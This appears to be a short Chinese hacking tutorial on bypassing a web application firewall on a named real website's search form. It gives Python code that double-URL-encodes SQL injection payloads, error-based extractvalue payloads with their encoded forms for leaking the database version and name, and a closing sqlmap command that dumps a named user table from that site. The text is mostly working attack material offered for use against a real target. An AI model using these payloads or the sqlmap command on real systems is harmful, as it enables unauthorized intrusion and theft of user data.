例子:
http://www.gzidc.org/search/
post 的数据:
keyword=a
如果单纯的在搜索框中输入:select , union,detele,' 那么就会被waf阻拦页面会显示:非法字符
如果用双重编码的url替换注入语句那么,waf就不会拦截
下面我写了一个程序来讲普通的注入语句转换为双重url编码:
import string
payload="' and extractvalue(1, concat(0x5c,version())) #"
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%25%.2X' % ord(payload[i])
i += 1
print retVal
那么我们用的一切注入语句都可以这样表示:
比如:
' and extractvalue(1, concat(0x5c,version())) #
转换之后为:
%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2576%2565%2572%2573%2569%256F%256E%2528%2529%2529%2529%2520%2523
然后丢到搜索框里面,然后通过报错信息得到数据库版本号
在比如:
' and extractvalue(1, concat(0x5c,(select database()))) #转换之后为
%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2528%2573%2565%256C%2565%2563%2574%2520%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2529%2529%2529%2520%2523
就能拿到数据库的名字
愉快的注入吧
sqlmap 指令:sqlmap -u "http://www.gzidc.org/search/" --data "keyword=1" --tamper chardoubleencode -D "gzidc" -T "shl_user" --dump -v 3